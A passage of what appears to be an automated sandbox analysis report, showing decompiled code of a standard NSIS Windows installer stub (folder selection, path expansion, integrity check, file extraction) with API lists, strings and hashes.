              							_v56 = _t146;
              							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
              							_t122 =  &_v80;
              							_v64 = 0x41;
              							__imp__SHBrowseForFolderA(_t122);
              							if(_t122 == 0) {
              								_a8 = 0x40f;
              							} else {
              								__imp__CoTaskMemFree(_t122);
              								E004056BA(_t146);
              								_t125 =  *((intOrPtr*)( *0x42ec30 + 0x11c));
              								if( *((intOrPtr*)( *0x42ec30 + 0x11c)) != 0 && _t146 == 0x434400) {
              									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
              									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
              										lstrcatA(_t146, 0x42dbc0);
              									}
              								}
              								 *0x42a08c =  *0x42a08c + 1;
              								SetDlgItemTextA(_t166, 0x3fb, _t146);
              							}
              						}
              						goto L20;
              					}
              					if(_a12 >> 0x10 != 0x300) {
              						goto L53;
              					}
              					_a8 = 0x40f;
              					goto L12;
              				} else {
              					_t165 = GetDlgItem(_t166, 0x3fb);
              					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
              						E004056BA(_t146);
              					}
              					 *0x42e3f8 = _t166;
              					SetWindowTextA(_t165, _t146);
              					_push( *((intOrPtr*)(_a16 + 0x34)));
              					_push(1);
              					E00403E83(_t166);
              					_push( *((intOrPtr*)(_a16 + 0x30)));
              					_push(0x14);
              					E00403E83(_t166);
              					E00403EB8(_t165);
              					_t138 = E00405F57(0xa);
              					if(_t138 == 0) {
              						L53:
              						return E00403EEA(_a8, _a12, _a16);
              					} else {
              						 *_t138(_t165, 1);
              						goto L8;
              					}
              				}
              			}

              APIs
              • GetDlgItem.USER32(?,000003FB), ref: 00404310
              • SetWindowTextA.USER32(00000000,?), ref: 0040433A
              • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
              • CoTaskMemFree.OLE32(00000000), ref: 004043F6
              • lstrcmpiA.KERNEL32(0042DBC0,0042A0A0,00000000,?,?), ref: 00404428
              • lstrcatA.KERNEL32(?,0042DBC0), ref: 00404434
              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404446
                • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E81
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E8E
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E93
                • Part of subcall function 00405E29: CharPrevA.USER32(?,?), ref: 00405EA3
              • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
              • MulDiv.KERNEL32 ref: 0040451F
                • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                • Part of subcall function 00404678: SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A
              • API String ID: 2624150263-3554254475
              • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
              • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
              • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
              • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 74%
              			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
              				signed int _v8;
              				struct _ITEMIDLIST* _v12;
              				signed int _v16;
              				signed char _v20;
              				signed int _v24;
              				signed char _v28;
              				signed int _t36;
              				CHAR* _t37;
              				signed int _t39;
              				int _t40;
              				char _t50;
              				char _t51;
              				char _t53;
              				char _t55;
              				void* _t63;
              				signed int _t69;
              				signed int _t74;
              				signed int _t75;
              				char _t83;
              				void* _t85;
              				CHAR* _t86;
              				void* _t88;
              				signed int _t95;
              				signed int _t97;
              				void* _t98;
              
              				_t88 = __esi;
              				_t85 = __edi;
              				_t63 = __ebx;
              				_t36 = _a8;
              				if(_t36 < 0) {
              					_t36 =  *( *0x42e3fc - 4 + _t36 * 4);
              				}
              				_t74 =  *0x42ec58 + _t36;
              				_t37 = 0x42dbc0;
              				_push(_t63);
              				_push(_t88);
              				_push(_t85);
              				_t86 = 0x42dbc0;
              				if(_a4 - 0x42dbc0 < 0x800) {
              					_t86 = _a4;
              					_a4 = _a4 & 0x00000000;
              				}
              				while(1) {
              					_t83 =  *_t74;
              					if(_t83 == 0) {
              						break;
              					}
              					__eflags = _t86 - _t37 - 0x400;
              					if(_t86 - _t37 >= 0x400) {
              						break;
              					}
              					_t74 = _t74 + 1;
              					__eflags = _t83 - 0xfc;
              					_a8 = _t74;
              					if(__eflags <= 0) {
              						if(__eflags != 0) {
              							 *_t86 = _t83;
              							_t86 =  &(_t86[1]);
              							__eflags = _t86;
              						} else {
              							 *_t86 =  *_t74;
              							_t86 =  &(_t86[1]);
              							_t74 = _t74 + 1;
              						}
              						continue;
              					}
              					_t39 =  *(_t74 + 1);
              					_t75 =  *_t74;
              					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
              					_a8 = _a8 + 2;
              					_v28 = _t75 | 0x00000080;
              					_t69 = _t75;
              					_v24 = _t69;
              					__eflags = _t83 - 0xfe;
              					_v20 = _t39 | 0x00000080;
              					_v16 = _t39;
              					if(_t83 != 0xfe) {
              						__eflags = _t83 - 0xfd;
              						if(_t83 != 0xfd) {
              							__eflags = _t83 - 0xff;
              							if(_t83 == 0xff) {
              								__eflags = (_t39 | 0xffffffff) - _t95;
              								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
              							}
              							L41:
              							_t40 = lstrlenA(_t86);
              							_t74 = _a8;
              							_t86 =  &(_t86[_t40]);
              							_t37 = 0x42dbc0;
              							continue;
              						}
              						__eflags = _t95 - 0x1d;
              						if(_t95 != 0x1d) {
              							__eflags = (_t95 << 0xa) + 0x42f000;
              							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
              						} else {
              							E00405B25(_t86,  *0x42ec28);
              						}
              						__eflags = _t95 + 0xffffffeb - 7;
              						if(_t95 + 0xffffffeb < 7) {
              							L32:
              							E00405E29(_t86);
              						}
              						goto L41;
              					}
              					_t97 = 2;
              					_t50 = GetVersion();
              					__eflags = _t50;
              					if(_t50 >= 0) {
              						L12:
              						_v8 = 1;
              						L13:
              						__eflags =  *0x42eca4;
              						if( *0x42eca4 != 0) {
              							_t97 = 4;
              						}
              						__eflags = _t69;
              						if(_t69 >= 0) {
              							__eflags = _t69 - 0x25;
              							if(_t69 != 0x25) {
              								__eflags = _t69 - 0x24;
              								if(_t69 == 0x24) {
              									GetWindowsDirectoryA(_t86, 0x400);
              									_t97 = 0;
              								}
              								while(1) {
              									__eflags = _t97;
              									if(_t97 == 0) {
              										goto L29;
              									}
              									_t51 =  *0x42ec24;
              									_t97 = _t97 - 1;
              									__eflags = _t51;
              									if(_t51 == 0) {
              										L25:
              										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
              										__eflags = _t53;
              										if(_t53 != 0) {
              											L27:
              											 *_t86 =  *_t86 & 0x00000000;
              											__eflags =  *_t86;
              											continue;
              										}
              										__imp__SHGetPathFromIDListA(_v12, _t86);
              										__imp__CoTaskMemFree(_v12);
              										__eflags = _t53;
              										if(_t53 != 0) {
              											goto L29;
              										}
              										goto L27;
              									}
              									__eflags = _v8;
              									if(_v8 == 0) {
              										goto L25;
              									}
              									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
              									__eflags = _t55;
              									if(_t55 == 0) {
              										goto L29;
              									}
              									goto L25;
              								}
              								goto L29;
              							}
              							GetSystemDirectoryA(_t86, 0x400);
              							goto L29;
              						} else {
              							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
              							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
              							__eflags =  *_t86;
              							if( *_t86 != 0) {
              								L30:
              								__eflags = _v16 - 0x1a;
              								if(_v16 == 0x1a) {
              									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
              								}
              								goto L32;
              							}
              							E00405BE9(_t72, _t86, _t97, _t86, _v16);
              							L29:
              							__eflags =  *_t86;
              							if( *_t86 == 0) {
              								goto L32;
              							}
              							goto L30;
              						}
              					}
              					__eflags = _t50 - 0x5a04;
              					if(_t50 == 0x5a04) {
              						goto L12;
              					}
              					__eflags = _v16 - 0x23;
              					if(_v16 == 0x23) {
              						goto L12;
              					}
              					__eflags = _v16 - 0x2e;
              					if(_v16 == 0x2e) {
              						goto L12;
              					} else {
              						_v8 = _v8 & 0x00000000;
              						goto L13;
              					}
              				}
              				 *_t86 =  *_t86 & 0x00000000;
              				if(_a4 == 0) {
              					return _t37;
              				}
              				return E00405BC7(_a4, _t37);
              			}

              APIs
              • GetVersion.KERNEL32(?,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
              • GetSystemDirectoryA.KERNEL32(0042DBC0,00000400), ref: 00405D0C
              • GetWindowsDirectoryA.KERNEL32(0042DBC0,00000400), ref: 00405D1F
              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405D5B
              • SHGetPathFromIDListA.SHELL32(?,0042DBC0), ref: 00405D69
              • CoTaskMemFree.OLE32(?), ref: 00405D74
              • lstrcatA.KERNEL32(0042DBC0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
              • lstrlenA.KERNEL32(0042DBC0,?,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
              Strings
              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D90
              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CDB
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 900638850-730719616
              • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
              • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
              • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
              • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00402C55(void* __eflags, signed int _a4) {
              				DWORD* _v8;
              				DWORD* _v12;
              				void* _v16;
              				intOrPtr _v20;
              				long _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				intOrPtr _v40;
              				signed int _v44;
              				long _t50;
              				intOrPtr* _t59;
              				long _t70;
              				signed int _t77;
              				intOrPtr _t80;
              				long _t82;
              				void* _t85;
              				void* _t89;
              				long _t90;
              				long _t93;
              				intOrPtr* _t94;
              
              				_t82 = 0;
              				_v12 = 0;
              				_v8 = 0;
              				 *0x42ec2c = GetTickCount() + 0x3e8;
              				GetModuleFileNameA(0, 0x435c00, 0x400);
              				_t89 = E0040589E(0x435c00, 0x80000000, 3);
              				_v16 = _t89;
              				 *0x409014 = _t89;
              				if(_t89 == 0xffffffff) {
              					return "Error launching installer";
              				}
              				E00405BC7(0x434c00, 0x435c00);
              				E00405BC7(0x436000, E00405701(0x434c00));
              				_t50 = GetFileSize(_t89, 0);
              				 *0x428c50 = _t50;
              				_t93 = _t50;
              				if(_t50 <= 0) {
              					L24:
              					E00402BF1(1);
              					if( *0x42ec34 == _t82) {
              						goto L29;
              					}
              					if(_v8 == _t82) {
              						L28:
              						_t94 = GlobalAlloc(0x40, _v24);
              						E004030E2( *0x42ec34 + 0x1c);
              						_push(_v24);
              						_push(_t94);
              						_push(_t82);
              						_push(0xffffffff);
              						if(E00402E8E() == _v24) {
              							 *0x42ec30 = _t94;
              							 *0x42ec38 =  *_t94;
              							if((_v44 & 0x00000001) != 0) {
              								 *0x42ec3c =  *0x42ec3c + 1;
              							}
              							_t40 = _t94 + 0x44; // 0x44
              							_t59 = _t40;
              							_t85 = 8;
              							do {
              								_t59 = _t59 - 8;
              								 *_t59 =  *_t59 + _t94;
              								_t85 = _t85 - 1;
              							} while (_t85 != 0);
              							 *((intOrPtr*)(_t94 + 0x3c)) = SetFilePointer(_v16, _t82, _t82, 1);
              							E0040585F(0x42ec40, _t94 + 4, 0x40);
              							return 0;
              						}
              						goto L29;
              					}
              					E004030E2( *0x414c40);
              					if(E004030B0( &_a4, 4) == 0 || _v12 != _a4) {
              						goto L29;
              					} else {
              						goto L28;
              					}
              				} else {
              					do {
              						_t90 = _t93;
              						asm("sbb eax, eax");
              						_t70 = ( ~( *0x42ec34) & 0x00007e00) + 0x200;
              						if(_t93 >= _t70) {
              							_t90 = _t70;
              						}
              						if(E004030B0(0x420c50, _t90) == 0) {
              							E00402BF1(1);
              							L29:
              							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
              						}
              						if( *0x42ec34 != 0) {
              							if((_a4 & 0x00000002) == 0) {
              								E00402BF1(0);
              							}
              							goto L20;
              						}
              						E0040585F( &_v44, 0x420c50, 0x1c);
              						_t77 = _v44;
              						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
              							_a4 = _a4 | _t77;
              							 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
              							_t80 = _v20;
              							 *0x42ec34 =  *0x414c40;
              							if(_t80 > _t93) {
              								goto L29;
              							}
              							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
              								_v8 = _v8 + 1;
              								_t93 = _t80 - 4;
              								if(_t90 > _t93) {
              									_t90 = _t93;
              								}
              								goto L20;
              							} else {
              								break;
              							}
              						}
              						L20:
              						if(_t93 <  *0x428c50) {
              							_v12 = E00405FC6(_v12, 0x420c50, _t90);
              						}
              						 *0x414c40 =  *0x414c40 + _t90;
              						_t93 = _t93 - _t90;
              					} while (_t93 > 0);
              					_t82 = 0;
              					goto L24;
              				}
              			}


              APIs
              • GetTickCount.KERNEL32(00435400,?,00000000), ref: 00402C66
              • GetModuleFileNameA.KERNEL32(00000000,00435C00,00000400), ref: 00402C82
                • Part of subcall function 0040589E: GetFileAttributesA.KERNEL32(00000003,00402C95,00435C00,80000000,00000003), ref: 004058A2
                • Part of subcall function 0040589E: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
              • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,00434C00,00434C00,00435C00,00435C00,80000000,00000003), ref: 00402CCE
              Strings
              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
              • Error launching installer, xrefs: 00402CA5
              • Null, xrefs: 00402D4C
              • Inst, xrefs: 00402D3A
              • soft, xrefs: 00402D43
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: File$AttributesCountCreateModuleNameSizeTick
              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
              • API String ID: 4283519449-1074636621
              • Opcode ID: aa3f9cec0a553ea999bd6714df17e66e600ffe4cfe58bd24a942f15de3713587
              • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
              • Opcode Fuzzy Hash: aa3f9cec0a553ea999bd6714df17e66e600ffe4cfe58bd24a942f15de3713587
              • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 95%
              			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
              				signed int _v8;
              				long _v12;
              				void* _v16;
              				long _v20;
              				long _v24;
              				intOrPtr _v28;
              				char _v92;
              				void* _t68;
              				long _t74;
              				intOrPtr _t79;
              				long _t80;
              				void* _t97;
              				void* _t100;
              				long _t101;
              				signed int _t102;
              				long _t103;
              				int _t104;
              				long _t106;
              				void* _t107;
              
              				_t102 = _a16;
              				_t97 = _a12;
              				_v12 = _t102;
              				if(_t97 == 0) {
              					_v12 = 0x8000;
              				}
              				_v8 = _v8 & 0x00000000;
              				_v16 = _t97;
              				if(_t97 == 0) {
              					_v16 = 0x418c48;
              				}
              				_t65 = _a4;
              				if(_a4 >= 0) {
              					E004030E2( *0x42ec78 + _t65);
              				}
              				if(E004030B0( &_a16, 4) == 0) {
              					L34:
              					_push(0xfffffffd);
              					goto L35;
              				} else {
              					if((_a19 & 0x00000080) == 0) {
              						if(_t97 == 0) {
              							while(_a16 > 0) {
              								_t103 = _v12;
              								if(_a16 < _t103) {
              									_t103 = _a16;
              								}
              								if(E004030B0(0x414c48, _t103) == 0) {
              									goto L34;
              								} else {
              									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
              										L29:
              										_push(0xfffffffe);
              										L35:
              										_pop(_t68);
              										return _t68;
              									} else {
              										_v8 = _v8 + _t103;
              										_a16 = _a16 - _t103;
              										continue;
              									}
              								}
              							}
              							L45:
              							return _v8;
              						}
              						if(_a16 < _t102) {
              							_t102 = _a16;
              						}
              						if(E004030B0(_t97, _t102) != 0) {
              							_v8 = _t102;
              							goto L45;
              						} else {
              							goto L34;
              						}
              					}
              					_t74 = GetTickCount();
              					 *0x40b5ac =  *0x40b5ac & 0x00000000;
              					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
              					_t14 =  &_a16;
              					 *_t14 = _a16 & 0x7fffffff;
              					_v20 = _t74;
              					 *0x40b090 = 8;
              					 *0x414c38 = 0x40cc30;
              					 *0x414c34 = 0x40cc30;
              					 *0x414c30 = 0x414c30;
              					_a4 = _a16;
              					if( *_t14 <= 0) {
              						goto L45;
              					} else {
              						goto L9;
              					}
              					while(1) {
              						L9:
              						_t104 = 0x4000;
              						if(_a16 < 0x4000) {
              							_t104 = _a16;
              						}
              						if(E004030B0(0x414c48, _t104) == 0) {
              							goto L34;
              						}
              						_a16 = _a16 - _t104;
              						 *0x40b080 = 0x414c48;
              						 *0x40b084 = _t104;
              						while(1) {
              							_t100 = _v16;
              							 *0x40b088 = _t100;
              							 *0x40b08c = _v12;
              							_t79 = E00406034(0x40b080);
              							_v28 = _t79;
              							if(_t79 < 0) {
              								break;
              							}
              							_t106 =  *0x40b088 - _t100;
              							_t80 = GetTickCount();
              							_t101 = _t80;
              							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
              								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
              								_t107 = _t107 + 0xc;
              								E00404EB3(0,  &_v92);
              								_v20 = _t101;
              							}
              							if(_t106 == 0) {
              								if(_a16 > 0) {
              									goto L9;
              								}
              								goto L45;
              							} else {
              								if(_a12 != 0) {
              									_v8 = _v8 + _t106;
              									_v12 = _v12 - _t106;
              									_v16 =  *0x40b088;
              									L24:
              									if(_v28 != 1) {
              										continue;
              									}
              									goto L45;
              								}
              								if(WriteFile(_a8, _v16, _t106,  &_v24, 0) == 0 || _v24 != _t106) {
              									goto L29;
              								} else {
              									_v8 = _v8 + _t106;
              									goto L24;
              								}
              							}
              						}
              						_push(0xfffffffc);
              						goto L35;
              					}
              					goto L34;
              				}
              			}


              APIs
              • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EF5
              • GetTickCount.KERNEL32(0040B080,00414C48,00004000), ref: 00402F9C
              • MulDiv.KERNEL32 ref: 00402FC5
              • wsprintfA.USER32 ref: 00402FD5
              • WriteFile.KERNEL32(00000000,00000000,?,7FFFFFFF,00000000), ref: 00403003
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CountTick$FileWritewsprintf
              • String ID: ... %d%%$HLA$HLA
              • API String ID: 4209647438-295942573
              • Opcode ID: 524ff0b34f7de7c8497ac67c33f70f76f9eeac22fa07b1060422ca7ed01ea917
              • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
              • Opcode Fuzzy Hash: 524ff0b34f7de7c8497ac67c33f70f76f9eeac22fa07b1060422ca7ed01ea917
              • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
              				struct tagLOGBRUSH _v16;
              				long _t35;
              				long _t37;
              				void* _t40;
              				long* _t49;
              
              				if(_a4 + 0xfffffecd > 5) {
              					L15:
              					return 0;
              				}
              				_t49 = GetWindowLongA(_a12, 0xffffffeb);
              				if(_t49 == 0) {
              					goto L15;
              				}
              				_t35 =  *_t49;
              				if((_t49[5] & 0x00000002) != 0) {
              					_t35 = GetSysColor(_t35);
              				}
              				if((_t49[5] & 0x00000001) != 0) {
              					SetTextColor(_a8, _t35);
              				}
              				SetBkMode(_a8, _t49[4]);
              				_t37 = _t49[1];
              				_v16.lbColor = _t37;
              				if((_t49[5] & 0x00000008) != 0) {
              					_t37 = GetSysColor(_t37);
              					_v16.lbColor = _t37;
              				}
              				if((_t49[5] & 0x00000004) != 0) {
              					SetBkColor(_a8, _t37);
              				}
              				if((_t49[5] & 0x00000010) != 0) {
              					_v16.lbStyle = _t49[2];
              					_t40 = _t49[3];
              					if(_t40 != 0) {
              						DeleteObject(_t40);
              					}
              					_t49[3] = CreateBrushIndirect( &_v16);
              				}
              				return _t49[3];
              			}


              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
              • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
              • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
              • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 86%
              			E004026AF(struct _OVERLAPPED* __ebx) {
              				void* _t27;
              				long _t32;
              				struct _OVERLAPPED* _t47;
              				void* _t51;
              				void* _t53;
              				void* _t56;
              				void* _t57;
              				void* _t58;
              
              				_t47 = __ebx;
              				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
              				_t52 = E00402A29(0xfffffff0);
              				 *(_t58 - 0x38) = _t24;
              				if(E00405727(_t52) == 0) {
              					E00402A29(0xffffffed);
              				}
              				E0040587F(_t52);
              				_t27 = E0040589E(_t52, 0x40000000, 2);
              				 *(_t58 + 8) = _t27;
              				if(_t27 != 0xffffffff) {
              					_t32 =  *0x42ec34;
              					 *(_t58 - 0x30) = _t32;
              					_t51 = GlobalAlloc(0x40, _t32);
              					if(_t51 != _t47) {
              						E004030E2(_t47);
              						E004030B0(_t51,  *(_t58 - 0x30));
              						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
              						 *(_t58 - 0x34) = _t56;
              						if(_t56 != _t47) {
              							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
              							while( *_t56 != _t47) {
              								_t49 =  *_t56;
              								_t57 = _t56 + 8;
              								 *(_t58 - 0x48) =  *_t56;
              								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
              								_t56 = _t57 +  *(_t58 - 0x48);
              							}
              							GlobalFree( *(_t58 - 0x34));
              						}
              						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
              						GlobalFree(_t51);
              						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
              					}
              					CloseHandle( *(_t58 + 8));
              				}
              				_t53 = 0xfffffff3;
              				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
              					_t53 = 0xffffffef;
              					DeleteFileA( *(_t58 - 0x38));
              					 *((intOrPtr*)(_t58 - 4)) = 1;
              				}
              				_push(_t53);
              				E00401423();
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
              				return 0;
              			}


              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
              • GlobalFree.KERNEL32(?), ref: 00402758
              • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
              • GlobalFree.KERNEL32(00000000), ref: 00402771
              • CloseHandle.KERNEL32(?), ref: 00402789
              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
              • String ID:
              • API String ID: 3294113728-0
              • Opcode ID: c8529e661290c7c84616a2a4682b07d72f06e259a4de3124d59d70fcaf5f5b24
              • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
              • Opcode Fuzzy Hash: c8529e661290c7c84616a2a4682b07d72f06e259a4de3124d59d70fcaf5f5b24
              • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404EB3(CHAR* _a4, CHAR* _a8) {
              				struct HWND__* _v8;
              				signed int _v12;
              				CHAR* _v32;
              				long _v44;
              				int _v48;
              				void* _v52;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				CHAR* _t26;
              				signed int _t27;
              				CHAR* _t28;
              				long _t29;
              				signed int _t39;
              
              				_t26 =  *0x42e404;
              				_v8 = _t26;
              				if(_t26 != 0) {
              					_t27 =  *0x42ecd4;
              					_v12 = _t27;
              					_t39 = _t27 & 0x00000001;
              					if(_t39 == 0) {
